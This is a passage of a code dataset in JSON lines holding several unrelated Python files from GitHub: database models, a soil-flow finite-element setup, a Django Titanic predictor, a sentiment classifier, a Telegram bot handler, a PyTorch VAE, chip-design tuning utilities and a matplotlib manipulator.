other\n\n def __repr__(self):\n return 'Too lazy to write repr for CollegeExpense'\n\nclass Degree(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(1024), unique=True)\n college_salaries = db.relationship('CollegeDegreeSalary', backref='degree')\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return '\\nname: {}\\n'.format(self.name)\n\nclass CollegeDegreeSalary(db.Model):\n __table_args__ = (db.UniqueConstraint('degree_id', 'college_id', name='college_payoff'),)\n\n id = db.Column(db.Integer, primary_key=True)\n degree_id = db.Column(db.Integer, db.ForeignKey('degree.id'))\n college_id = db.Column(db.Integer, db.ForeignKey('college.id'))\n salary = db.Column(db.Integer)\n\n def __init__(self, degree_id, college_id, salary):\n self.degree_id = degree_id\n self.college_id = college_id\n self.salary = salary\n\n def __repr__(self):\n return '\\ndegree_id: {}, college_id: {}, salary: {}\\n'.format(self.degree_id, \n self.college_id, self.salary)\n","repo_name":"bigolu/ru-coursework","sub_path":"databases/final-project/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"39799379052","text":"r\"\"\"\nvariational formulation described at https://www.authorea.com/users/23640/articles/61529\nInspired from http://sfepy.org/doc-devel/examples/diffusion/poisson_field_dependent_material.html\nHelp thread: https://groups.google.com/forum/#!msg/sfepy-devel/dbEy3I3jSOg/mxQJEkpOCAAJ\n\ncd ~bin/sfepy\n./simple.py SEP_pdf/EnvGeotech/Richards-Buckingham_SfePy.py --save-regions-as-groups\n./postproc.py cube_big_tetra_regions.vtk # works with mayavi <= 4.2\n\"\"\"\n\nfrom sfepy import data_dir\nfrom sfepy.base.base import output\nimport numpy as np\n\nfilename_mesh = data_dir + '/meshes/3d/cube_big_tetra.mesh'\n\n# Constitutive relationships expressed in terms of psi, where psi is suction (psi = -h)\ndef vanGenuchten(ksat, aVG, nVG, mVG, lVG, psi):\n k = np.piecewise(psi, [psi < 0, psi >= 0],\n [ksat, ksat*((1-((aVG*psi[psi >= 0])**(nVG*mVG))*((1+((aVG*psi[psi >= 0])**nVG))**(-mVG)))**2) / ((1+((aVG*psi[psi >= 0])**nVG))**(mVG*lVG))])\n return(k)\n\ndef brooksCorey(aev, lBC, ksat, psi):\n k = np.piecewise(psi, [psi < aev, psi >= aev],\n [ksat, ksat * (psi[psi >= aev] / aev) ** (-2 - 3 * lBC)])\n return(k)\n\n# Material parameters\n## the initial residual is almost zero - this might mean that you need some\n## scaling of parameters, so that the entries in the rhs (and the matrix) are not\n## too small. - Robert Cimrman, https://groups.google.com/forum/#!topic/sfepy-devel/dbEy3I3jSOg\nscaling = 1\n\n## typical uniform silt\nsilt_thR = 0.034\nsilt_thS = 0.460\nsilt_ksat = 7E-7 * scaling\n\n### van Genuchten parameters\nsilt_aVG = 1.6 / scaling\nsilt_nVG = 1.37\nsilt_mVG = 1 - (1 / silt_nVG)\nsilt_lVG = 0.5\n\n### Brooks and Corey parameters\nsilt_aev = 0.35 * scaling\nsilt_lBC = 0.35\n\ndef get_conductivity(ts, coors, problem, equations = None, mode = None, **kwargs):\n \"\"\"\n Calculates the conductivity with a constitutive k(psi) relation,\n where psi = -h.\n \"\"\"\n if mode == 'qp':\n\n ## Get pressure values\n h_values = problem.evaluate('ev_volume_integrate.i.Omega(h)',\n mode = 'qp', verbose = False) * scaling\n psi_values = -h_values\n\n # van Genuchten\n val = vanGenuchten(ksat = silt_ksat, aVG = silt_aVG, nVG = silt_nVG,\n mVG = silt_mVG, lVG = silt_lVG, psi = psi_values)\n\n # Brooks and Corey\n #val = brooksCorey(ksat = silt_ksat, aev = silt_aev, lBC = silt_lBC,\n # psi = psi_values)\n\n # Reshape the val vector to match SfePy expectations\n val.shape = (val.shape[0] * val.shape[1], 1, 1)\n\n # Check output\n output('h_values: min:', h_values.min(), 'max:', h_values.max())\n output('conductivity: min:', val.min(), 'max:', val.max())\n\n return {'val' : val}\n\n\nmaterials = {\n 'coef' : 'get_conductivity',\n 'flux' : ({'val' : 3E-8 * scaling},),\n}\n\nfields = {\n 'pressure' : ('real', 1, 'Omega', 1),\n}\n\nvariables = {\n 'h' : ('unknown field', 'pressure', 0),\n 'v' : ('test field', 'pressure', 'h'),\n}\n\nregions = {\n 'Omega' : 'all',\n 'Gamma_Bottom' : ('vertices in (z < -0.49999)', 'facet'),\n 'Gamma_Top' : ('vertices in (z > 0.49999)', 'facet'),\n}\n\nebcs = {\n 'P1' : ('Gamma_Bottom', {'h.0' : 0}),\n}\n\nfunctions = {\n 'get_conductivity' : (get_conductivity,),\n}\n\nintegrals = {\n 'i' : 2, # not sure of value to use here\n}\n\nequations = {\n 'Pressure' : \"\"\"dw_laplace.i.Omega(coef.val, v, h) - dw_surface_integrate.i.Gamma_Top(flux.val, v) = 0\"\"\"\n}\n\nsolvers = {\n 'ls' : ('ls.scipy_direct', {}),\n 'newton' : ('nls.newton', {\n 'i_max' : 1,\n 'eps_a' : -1e-10,\n 'eps_r' : -1,\n }),\n 'ts' : ('ts.simple', {\n 't0' : 0.0,\n 't1' : 1.0,\n 'dt' : None,\n 'n_step' : 5,\n 'quasistatic' : True,\n }),\n}\n\noptions = {\n 'ts' : 'ts',\n 'nls' : 'newton',\n 'ls' : 'ls',\n}\n\noptions = {\n 'nls' : 'newton',\n 'ls' : 'ls',\n}\n","repo_name":"essicolo/EnvGeotech","sub_path":"Richards-Buckingham_SfePy.py","file_name":"Richards-Buckingham_SfePy.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"434935957","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nimport pickle\nimport numpy as np\nimport pandas as pd\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, 'survived/index.html')\n\n\ndef predict(request):\n # Load the model\n with open('data/model.pkl', 'rb') as file:\n model = pickle.load(file)\n \n if model is None:\n return HttpResponse('there is no model')\n\n # Load the dataset\n df = pd.read_csv('data/train.csv')\n\n # Clean the dataset\n\n df['Sex'] = df['Sex'].map(dict(male=1.0, female=0.0))\n df.drop(columns=['PassengerId', 'Survived'], inplace=True)\n df['Age'].fillna(df['Age'].mean(), inplace=True)\n df = df.select_dtypes(exclude='object')\n\n # If method is POST\n if request.method == \"POST\":\n\n # Svaing request POST\n name = request.POST['name']\n \n # Create a new dataframe\n X = pd.DataFrame(\n dict(\n pclass = float(request.POST['pclass']),\n sex = 1.0 if request.POST['sex'] == 'male' else 0.0,\n age = float(request.POST['age']),\n sibsp = request.POST['sibsp'],\n parch = request.POST['parch'],\n fare = request.POST['fare'],\n C = 0.0,\n Q = 0.0,\n S = 1.0,\n Master = 1.0 if request.POST['title'] == 'Master' else 0.0,\n Miss = 1.0 if request.POST['title'] == 'Miss' else 0.0,\n Mr = 1.0 if request.POST['title'] == 'Mr' else 0.0,\n Mrs = 1.0 if request.POST['title'] == 'Mrs' else 0.0,\n Other = 1.0 if request.POST['title'] == 'Other' else 0.0\n ), index=[0]\n )\n \n pred = model.predict(X)\n return render(request, 'survived/predict.html', {\n \"predict\": pred[0],\n \"name\": name\n })\n\n \n \n\n\n","repo_name":"mdbruchard/titanic","sub_path":"survived/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"13117801675","text":"#!/usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n# author:Administrator\r\n# datetime:2019/1/19 19:06\r\n# software: PyCharm\r\nfrom date20190119.route_scheme.map import *\r\nclass Run():\r\n def go_run(self):\r\n self.start=input(\"请输入起点:\")\r\n self.end=input(\"请输入终点:\")\r\n self.trip_mode=input(\"请输入出行方式(公交,驾车,步行):\")\r\n self.trip_mode1=map().trip_mode(self.trip_mode)\r\n\r\n start_point=map().get_Position_Info(self.start)\r\n end_point=map().get_Position_Info(self.end)\r\n\r\n map().path(start_point[0],start_point[1],self.start,\r\n end_point[0],end_point[1],self.end,self.trip_mode1)\r\n\r\nif __name__ == '__main__':\r\n Run().go_run()","repo_name":"RedAnanas/macbendi","sub_path":"date20190119/route_scheme/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"7576283497","text":"import pandas as pd # data processing, CSV file I/O\nfrom sklearn.model_selection import train_test_split # function for splitting data to train and test sets\n\nimport nltk\nfrom nltk.corpus import stopwords\n# from wordcloud import WordCloud, STOPWORDS\n# import matplotlib.pyplot as plt\nimport time\nstart_time = time.time()\n\ndata = pd.read_csv('Tweets.csv', nrows=2000)\ndata = data[['text', 'airline_sentiment']]\ndata = data[data.airline_sentiment != \"neutral\"]\n# data = data[1:2000]\ntrain, test = train_test_split(data, test_size=0.4)\n\ntrain_pos = train[train['airline_sentiment'] == 'positive']\ntrain_pos = train_pos['text']\ntrain_neg = train[train['airline_sentiment'] == 'negative']\ntrain_neg = train_neg['text']\n\n\n# def wordcloud_draw(data, color='black'):\n# words = ' '.join(data)\n# cleaned_word = \" \".join([word for word in words.split()\n# if 'http' not in word\n# and not word.startswith('@')\n# and not word.startswith('#')\n# and word != 'RT'\n# ])\n# wordcloud = WordCloud(stopwords=STOPWORDS,\n# background_color=color,\n# width=2500,\n# height=2000\n# ).generate(cleaned_word)\n# plt.figure(1, figsize=(13, 13))\n# plt.imshow(wordcloud)\n# plt.axis('off')\n# plt.show()\n\n\n#print(\"Positive words\")\n#wordcloud_draw(train_pos, 'white')\n#print(\"Negative words\")\n#wordcloud_draw(train_neg)\n\ntweets = []\nstopwords_set = set(stopwords.words(\"english\"))\n\nfor index, row in train.iterrows():\n words_filtered = [e.lower() for e in row.text.split() if len(e) >= 3]\n words_cleaned = [word for word in words_filtered\n if 'http' not in word\n and not word.startswith('@')\n and not word.startswith('#')\n and word != 'RT']\n words_without_stopwords = [word for word in words_cleaned if not word in stopwords_set]\n tweets.append((words_without_stopwords, row.airline_sentiment))\n\ntest_pos = test[test['airline_sentiment'] == 'positive']\ntest_pos = test_pos['text']\ntest_neg = test[test['airline_sentiment'] == 'negative']\ntest_neg = test_neg['text']\n\n\ndef get_words_in_tweets(tweets):\n all = []\n for (words, sentiment) in tweets:\n all.extend(words)\n return all\n\n\ndef get_word_features(wordlist):\n wordlist = nltk.FreqDist(wordlist)\n features = wordlist.keys()\n return features\n\n\nw_features = get_word_features(get_words_in_tweets(tweets))\n\n\ndef extract_features(document):\n document_words = set(document)\n features = {}\n for word in w_features:\n features['contains(%s)' % word] = (word in document_words)\n return features\n\n\n#print(\"features\")\n#wordcloud_draw(w_features)\n\n\ntraining_set = nltk.classify.apply_features(extract_features, tweets)\n\n# Training the Naive Bayes classifier\nclassifier = nltk.NaiveBayesClassifier.train(training_set)\n\nclassifier = nltk.Cl\n\n# # Training the Decision Tree classifier\n# classifier = nltk.DecisionTreeClassifier.train(training_set)\n\n\nneg_cnt = 0\npos_cnt = 0\nfor obj in test_neg:\n res = classifier.classify(extract_features(obj.split()))\n if res == 'negative':\n neg_cnt = neg_cnt + 1\nfor obj in test_pos:\n res = classifier.classify(extract_features(obj.split()))\n if res == 'positive':\n pos_cnt = pos_cnt + 1\n\nprint('[negative]: %s/%s ' % (neg_cnt, len(test_neg)))\nprint(neg_cnt/len(test_neg))\nprint('[positive]: %s/%s ' % (pos_cnt, len(test_pos)))\nprint(pos_cnt/len(test_pos))\n\naccuracy = (neg_cnt + pos_cnt) / (len(test_neg) + len(test_pos))\nprint('[accuracy]')\nprint(accuracy)\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"RuolanZeng/Twitter-Sentiment-Analysis","sub_path":"NLTK-Naive Bayes.py","file_name":"NLTK-Naive Bayes.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"27763307795","text":"# -*- coding: utf-8 -*-\n\n@bot.message_handler(commands=['setlang' , 'Setlang'])\ndef setlang_message(message):\n cur.execute('SELECT * from language where id = %s', [str(message.from_user.id)])\n record = cur.fetchall()\n for row in record:\n userid = row[0]\n userlang = row[1]\n \n if len(message.text.split()) < 2:\n bot.reply_to(message, \"Please choose a language! En/Fa \\nلطفا زبان مورد نظر خود را وارد کنید! فارسی/انگلیسی\", parse_mode=\"Markdown\")\n return\n if True:\n langz = message.text.replace(\"/setlang \",\"\",1).replace(\"/Setlang \",\"\",1)\n if langz == \"en\":\n cur.execute('INSERT INTO `language` (`id`, `language`) VALUES (%s, %s)', [str(message.from_user.id), \"en\"])\n db.commit()\n bot.send_message(message.chat.id, \"Success!\")\n elif langz == \"fa\":\n cur.execute('INSERT INTO `language` (`id`, `language`) VALUES (%s, %s)', [str(message.from_user.id), \"fa\"])\n db.commit()\n bot.send_message(message.chat.id, \"انجام شد!\")\n else:\n bot.reply_to(message, \"Language not found \\n زبان یافت نشد\")\n","repo_name":"SaloxiddinTursunaliev/TelegramTaxiBot","sub_path":"src/plugins/setlang.py","file_name":"setlang.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"20920980659","text":"import os\nimport sys \nsys.path.append(\".\")\n\nimport time\nimport numpy as np \nimport subprocess as sp\n\n\ndef getQoR(nameVars, variables, precfg, script, baseline, clkref, basedir=\"run\"): \n configs = precfg.copy()\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = basedir + \"/time\" + str(time.time()).replace(\".\", \"\")\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n try: \n runPythonCommand(script, configs, timeout=None, outfile=outfile)\n results = parseResult(outfile, clkref)\n except Exception as e: \n print(\"[EVALUATION]: FAILED or TIMEOUT\")\n print(e)\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n os.system(\"rm -rf \" + basedir + \" > /dev/null 2> /dev/null\")\n return portion\n\n\ndef parseResult(filename, clkref=2.5): \n slack, power, area = \"ERR\", \"ERR\", \"ERR\"\n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n for line in lines: \n splited = line.strip().split()\n if len(splited) >= 3: \n try: \n slack = clkref - float(splited[0])\n power = float(splited[1])\n area = float(splited[2])\n except ValueError: \n slack = \"ERR\"\n power = \"ERR\"\n area = \"ERR\"\n return [slack, power, area]\n\n\ndef evalQoR(nameVars, variables, baseline, iter, script, clkref, precfg, visited): \n print(\"[ITERATION]:\", iter, \";\", variables)\n configs = precfg.copy()\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = \"run/iter_\" + str(iter)\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n outfile = \"tmp.txt\"\n try: \n runPythonCommand(script, configs, timeout=None, outfile=outfile)\n results = parseResult(outfile, clkref)\n except Exception: \n print(\"[EVALUATION]: TIMEOUT\")\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n try: \n with open(visited, \"a+\") as fout: \n fout.write(\"Visited\\n\")\n fout.write(str(nameVars) + \"\\n\")\n fout.write(str(variables) + \"\\n\")\n fout.write(str(results) + \"\\n\")\n except Exception: \n pass\n return portion\n\n\ndef evaluate(nameVars, variables, baseline, iter): \n print(\"[ITERATION]:\", iter, \";\", variables)\n configs = {}\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = \"run/iter_\" + str(iter)\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n outfile = \"tmp.txt\"\n try: \n runPythonCommand(\"cmd/evaluate.py\", configs, timeout=600, outfile=outfile)\n results = parseResult(outfile)\n except Exception: \n print(\"[EVALUATION]: TIMEOUT\")\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n try: \n with open(\"visited.txt\", \"a+\") as fout: \n fout.write(\"Visited\\n\")\n fout.write(str(nameVars) + \"\\n\")\n fout.write(str(variables) + \"\\n\")\n fout.write(str(results) + \"\\n\")\n except Exception: \n pass\n return portion\n\n\ndef cadenceParse(filename, clkref=2.5): \n slack, power, area = \"ERR\", \"ERR\", \"ERR\"\n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n for line in lines: \n splited = line.strip().split()\n if len(splited) >= 3: \n try: \n slack = clkref-float(splited[0])\n power = float(splited[1])\n area = float(splited[2])\n except ValueError: \n slack = \"ERR\"\n power = \"ERR\"\n area = \"ERR\"\n return [slack, power, area]\n\n\ndef cadenceEval(nameVars, variables, baseline, iter): \n print(\"[ITERATION]:\", iter, \";\", variables)\n configs = {}\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = \"run/iter_\" + str(iter)\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n outfile = \"tmp.txt\"\n try: \n configs[\"hdl\"] = \"src/gcd.v\"\n configs[\"sdc\"] = \"src/gcd.sdc\"\n runPythonCommand(\"cmd/cadence.py\", configs, timeout=600, outfile=outfile)\n results = cadenceParse(outfile)\n except Exception: \n print(\"[EVALUATION]: TIMEOUT\")\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n try: \n with open(\"visited.txt\", \"a+\") as fout: \n fout.write(\"Visited\\n\")\n fout.write(str(nameVars) + \"\\n\")\n fout.write(str(variables) + \"\\n\")\n fout.write(str(results) + \"\\n\")\n except Exception: \n pass\n return portion\n\n\ndef readTrials(filename): \n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n \n configs = []\n scores = []\n idx = 0\n while idx < len(lines): \n while idx < len(lines) and lines[idx].strip() != \"Visited\": \n idx += 1\n idx += 1\n if idx + 2 >= len(lines): \n break\n nameVars = eval(lines[idx].strip())\n variables = eval(lines[idx + 1].strip())\n results = eval(lines[idx + 2].strip())\n idx += 2\n \n assert len(nameVars) == len(variables)\n config = {}\n for jdx, name in enumerate(nameVars): \n config[name] = variables[jdx]\n configs.append(config)\n scores.append(results)\n \n return configs, scores\n\n\ndef readConfig(filename): \n names = []\n types = []\n ranges = []\n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n for line in lines:\n line = line.strip()\n splited = line.split()\n if len(splited) < 3: \n continue\n name = splited[0]\n typename = splited[1]\n values = splited[2:]\n for idx in range(len(values)): \n if typename == \"int\": \n values[idx] = int(values[idx])\n elif typename == \"float\": \n values[idx] = float(values[idx])\n names.append(name)\n types.append(typename)\n ranges.append(values)\n return names, types, ranges\n \n\ndef runPythonCommand(filename, configs, timeout=None, outfile=None): \n command = [\"python3\", filename, ]\n for key, value in configs.items(): \n if isinstance(value, list) or isinstance(value, tuple): \n for elem in value: \n command.append(\"--\" + key)\n command.append(str(elem))\n else: \n command.append(\"--\" + key)\n command.append(str(value))\n fout = sp.DEVNULL\n if not outfile is None: \n fout = sp.PIPE\n ret = sp.run(command, timeout=timeout, shell=False, stdout=fout, stderr=fout)\n if not outfile is None: \n with open(outfile, \"w\") as fout: \n if ret.stdout.strip() != \"\": \n fout.write(ret.stdout.decode(\"UTF-8\"))\n if ret.stderr.strip() != \"\": \n fout.write(ret.stderr.decode(\"UTF-8\"))\n return ret.returncode\n \n\ndef dominate(a, b): \n assert len(a) == len(b)\n domin1 = True\n domin2 = False\n for idx in range(len(a)): \n if a[idx] > b[idx]: \n domin1 = False\n elif a[idx] < b[idx]: \n domin2 = True\n return domin1 and domin2\n \n\ndef newParetoSet(paretoParams, paretoValues, newParams, newValue): \n assert len(paretoParams) == len(paretoValues)\n dupli = False\n removed = set()\n indices = []\n for idx, elem in enumerate(paretoValues): \n if str(paretoParams[idx]) == str(newParams): \n dupli = True\n break\n if dominate(newValue, elem): \n removed.add(idx)\n if dupli: \n return paretoParams, paretoValues\n for idx, elem in enumerate(paretoValues): \n if not idx in removed: \n indices.append(idx)\n newParetoParams = []\n newParetoValues = []\n for index in indices: \n newParetoParams.append(paretoParams[index])\n newParetoValues.append(paretoValues[index])\n bedominated = False\n for idx, elem in enumerate(newParetoValues): \n if dominate(elem, newValue): \n bedominated = True\n if len(removed) > 0:\n assert not bedominated\n if len(removed) > 0 or len(paretoParams) == 0 or not bedominated: \n newParetoParams.append(newParams)\n newParetoValues.append(newValue)\n return newParetoParams, newParetoValues\n \n\ndef pareto(params, values): \n paretoParams = []\n paretoValues = []\n\n for var, objs in zip(params, values): \n paretoParams, paretoValues = newParetoSet(paretoParams, paretoValues, var, objs)\n\n return paretoParams, paretoValues\n \n\nif __name__ == \"__main__\": \n paretoParams = [0, 1, 2, 3, 4, 5, 6, 7]\n paretoValues = [[70.76775036084953, 176.14678899082568, 72.04301075268818], [75.61802643938873, 125.6880733944954, 81.72043010752688], [70.04834238321075, 379.8165137614679, 66.66666666666667], [78.62625151785919, 141.28440366972475, 62.365591397849464], [81.19000160377574, 306.42201834862385, 50.53763440860215], [95.55754118267005, 106.42201834862385, 77.41935483870968], [82.08582491351066, 107.33944954128441, 60.215053763440864], [78.01681673425435, 117.43119266055047, 63.44086021505376]]\n\n newParam = 8\n newValue = [89.75416408916993, 97.24770642201834, 26.88172043010752]\n\n paretoParams, paretoValues = newParetoSet(paretoParams, paretoValues, newParam, newValue)\n print(paretoParams, paretoValues)\n \n\n\n\n\n","repo_name":"shelljane/REMOTune","sub_path":"script/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
+{"seq_id":"14097107017","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n prehead = ListNode(-1)\n curr = prehead\n \n while l1 and l2:\n if l1.val > l2.val:\n curr.next = l2\n l2 = l2.next \n else:\n curr.next = l1\n l1 = l1.next\n curr = curr.next\n if l1 is not None:\n curr.next = l1 \n else:\n curr.next = l2 \n return prehead.next\n ","repo_name":"saviaga/Coding_E","sub_path":"merge-two-sorted-lists/merge-two-sorted-lists.py","file_name":"merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"30980937777","text":"import torch\nfrom torch import nn\nimport torchvision\n\nclass VAE(nn.Module):\n def __init__(self, latent_dim, device):\n super(VAE, self).__init__()\n self.device = device\n self.conv1 = nn.Sequential(\n nn.Conv2d(1,32, 3, stride=2, padding=1), # b, 64, 32, 32\n nn.BatchNorm2d(32),\n nn.ReLU()\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(32, 64, 3, stride=2, padding=1), # b, 128, 16, 16\n nn.BatchNorm2d(64),\n nn.ReLU()\n )\n self.conv3 = nn.Sequential(\n nn.Conv2d(64, 128, 3, stride=2, padding=1), \n nn.BatchNorm2d(128),\n nn.ReLU()\n )\n #self.linear1 = nn.Linear(128*self.H*self.W, 64)\n\n self.mean = nn.Sequential(\n nn.Linear(13312,latent_dim),# b, 64 ==> b, latent_dim\n )\n \n self.var = nn.Sequential(\n nn.Linear(13312,latent_dim),# b, 64 ==> b, latent_dim\n )\n self.decoder = nn.Sequential(\n nn.Linear(latent_dim,13312),# b, latent_dim ==> b, 13312\n nn.BatchNorm1d(13312),\n nn.ReLU(),\n )\n\n self.convTrans1 = nn.Sequential(\n nn.ConvTranspose2d(128, 64, 3, stride=1,padding = 0), \n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.UpsamplingNearest2d(size = [25, 16]),\n )\n self.convTrans2 = nn.Sequential(\n nn.ConvTranspose2d(64, 32, 3, stride=1,padding = 0), \n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.UpsamplingNearest2d(size = [50, 32]),\n )\n self.convTrans3 = nn.Sequential(\n nn.ConvTranspose2d(32, 1, 3, stride=1,padding = 0), # b, 3, 32, 32\n nn.BatchNorm2d(1),\n nn.UpsamplingNearest2d(size = [100, 64]),\n nn.Sigmoid()\n )\n \n def _sample_z(self, mean, var):\n\n epsilon = torch.randn(mean.shape, device=self.device)\n return mean + epsilon*torch.exp(0.5 * var)\n \n #Encoder\n def _encoder(self, x):\n x = self.conv1(x) \n x = self.conv2(x)\n x = self.conv3(x)\n x = x.view(x.shape[0], -1)\n mean = self.mean(x)\n var = self.var(x)\n return mean,var\n #Decoder\n def _decoder(self, z):\n z = self.decoder(z)\n z = z.view(-1,128,13,8)\n x = self.convTrans1(z)\n x = self.convTrans2(x)\n x = self.convTrans3(x)\n return x\n \n def forward(self, x):\n mean,var = self._encoder(x) #mean and log_variance\n z = self._sample_z(mean, var) \n x = self._decoder(z)\n return x,mean,var,z\n \n def loss(self, x):\n mean, var = self._encoder(x) #\\sigma^2\n \n KL = 0.5 * torch.mean(1 + var- mean**2 - torch.exp(var)) #KLDivvergence\n \n z = self._sample_z(mean, var) \n y = self._decoder(z) \n delta = 1e-7 \n\n reconstruction = torch.mean(x * torch.log(y+delta) + (1 - x) * torch.log(1 - y +delta)) #reconstruction loss\n lower_bound = [KL, reconstruction] \n\n return -sum(lower_bound) ,y,mean,var,z","repo_name":"Reo-I/anomaly-detection","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"26349005345","text":"#################################################\n### Manipulator ###\n### by Gleb Karmi - MIT License ###\n##################################################\nfrom matplotlib import use\nuse('TkAgg')\n\nfrom numpy import arange, sin, pi, linspace,fmod, copy as np_copy\ntry:\n\tfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nexcept :\n\tfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk #Agg\n\n# implement the default mpl key bindings\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nfrom matplotlib.pyplot import connect\nimport matplotlib.pyplot as plt\nimport tkinter as Tk\n\n\nclass CManipulator:\n\t__version__= '01.00.00 (01/06/2020)'\n\tUPDATE_AFTER_RELEASE = False\n\tdpi4fig = 200\n\tXo = arange(0,1,1);param={};prm_tot = 0;prm_prev={};X_label='X';Y_label='Y'\n\troot = Tk.Tk()\n\troot.wm_title(\"Embedding MatplotLib in TK, Manipulator Ver. %s\"%__version__)\n\tprm_string = ''\n\t# Stretch definition for the Figure\n\troot.columnconfigure(10,weight=1);root.columnconfigure(11,weight=1);root.columnconfigure(12,weight=1)\n\troot.columnconfigure(40,pad=1)\n\troot.rowconfigure(1, weight=0);root.rowconfigure(4, weight=1)\n\troot.rowconfigure(30, pad=7)\n\tgrf_title = None\n\tgrf_stile = ['-b',':r','-'] # the last is the default # ',' is a pixel\n\taliased = False\n\tgrid_on = False\n\txLim = [None, None]\n\tyLim = [None, None]\n\tSELF_PLOT_FUNCTION = False\n\tXc,Yc = 0,0\n\n\tdef __init__(self):\n\t\tself.evaluate_now=True\n\t\tself.m_func = self.a_line \n\t\tself.fig = Figure(figsize=(8, 6))#, dpi=100\n\t\t# ax = fig.add_subplot(111)\n\t\tself.fr = Tk.Frame()\n\t\tself.fr.grid(row=25, column=10, columnspan=30, rowspan=30, sticky=Tk.E+Tk.W+Tk.S+Tk.N)\n\n\t\t# canvas = FigureCanvasTkAgg(fig, master=fr) # for pack geometry method \n\t\tself.canvas = FigureCanvasTkAgg(self.fig, master=CManipulator.root) # for grid geometry method\n\t\tself.fig.canvas.mpl_connect('motion_notify_event', self.coursor_position_self)# after FigureCanvasTkAgg\n\t\t#canvas.show()\n\t\tself.canvas.draw()\n\n\t\ttry:\t\n\t\t\tself.toolbar = NavigationToolbar2TkAgg(self.canvas, self.fr)\n\t\texcept:\n\t\t\tself.toolbar = NavigationToolbar2Tk(self.canvas, self.fr)\n\t\tself.toolbar.update()\n\t\tself.update(self.canvas,self.fig)\n\n\t\tself.canvas.get_tk_widget().grid(row=3, column=10, columnspan=30, rowspan=20, sticky=Tk.E+Tk.W+Tk.S+Tk.N)\n\t\t# root.bind(\"\", dummy_function)\n\t\tCManipulator.root.bind(\"\", self.copy2clipboard )\n\n\tdef clear_mnp_params(self):\n\t\tself.evaluate_now=False \n\t\t#! Must turn the flag On before usage. With False value update() is not working !#\n\t\ttry: \t\n\t\t\tfor prm_name in self.param.keys():\t\t\n\t\t\t\tself.param[prm_name]['lbl']\t .destroy() #\n\t\t\t\tself.param[prm_name]['min_lbl'].destroy() #\n\t\t\t\tself.param[prm_name]['max_lbl'].destroy() #\n\t\t\t\tself.param[prm_name]['scale'] .destroy() #\n\t\texcept Exception as e:\n\t\t\tpass\t\n\t\t\t\t\n\t\tself.param, self.prm_prev = {}, {}\n\t\tself.prm_tot = 0\t\t\n\n\t# copy a matplotlib figure to clipboard as BMP on windows\n\t# 